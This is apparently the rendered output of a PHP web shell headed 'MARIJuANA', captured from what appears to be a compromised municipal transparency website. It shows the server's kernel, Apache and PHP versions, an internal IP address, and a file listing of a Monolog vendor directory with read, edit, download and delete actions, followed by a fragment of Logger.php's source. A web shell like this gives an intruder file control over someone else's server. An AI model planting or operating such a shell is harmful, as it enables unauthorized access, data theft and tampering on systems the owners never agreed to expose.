MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/guajeru/transparencia/assets/ckfinder/core/connector/php/vendor/monolog/monolog/src/Monolog/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
Formatter dir drwxr-xr-x 2021-07-19 13:06 R D
Handler dir drwxr-xr-x 2021-07-19 13:06 R D
Processor dir drwxr-xr-x 2021-07-19 13:05 R D
ErrorHandler.php 8.652 KB -rw-r--r-- 2021-07-19 12:55 R E G D
Logger.php 22.324 KB -rw-r--r-- 2021-07-19 12:55 R E G D
Registry.php 4.061 KB -rw-r--r-- 2021-07-19 12:55 R E G D
ResettableInterface.php 0.951 KB -rw-r--r-- 2021-07-19 12:55 R E G D
SignalHandler.php 4.207 KB -rw-r--r-- 2021-07-19 12:55 R E G D
Utils.php 0.541 KB -rw-r--r-- 2021-07-19 12:55 R E G D
REQUEST EXIT
* * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; use Monolog\Handler\HandlerInterface; use Monolog\Handler\StreamHandler; use Psr\Log\LoggerInterface; use Psr\Log\InvalidArgumentException; use Exception; /** * Monolog log channel * * It contains a stack of Handlers and a stack of Processors, * and uses them to store records that are added to it. * * @author Jordi Boggiano */ class Logger implements LoggerInterface, ResettableInterface { /** * Detailed debug information */ const DEBUG = 100; /** * Interesting events * * Examples: User logs in, SQL logs. */ const INFO = 200; /** * Uncommon events */ const NOTICE = 250; /** * Exceptional occurrences that are not errors * * Examples: Use of deprecated APIs, poor use of an API, * undesirable things that are not necessarily wrong. */ const WARNING = 300; /** * Runtime errors */ const ERROR = 400; /** * Critical conditions * * Example: Application component unavailable, unexpected exception.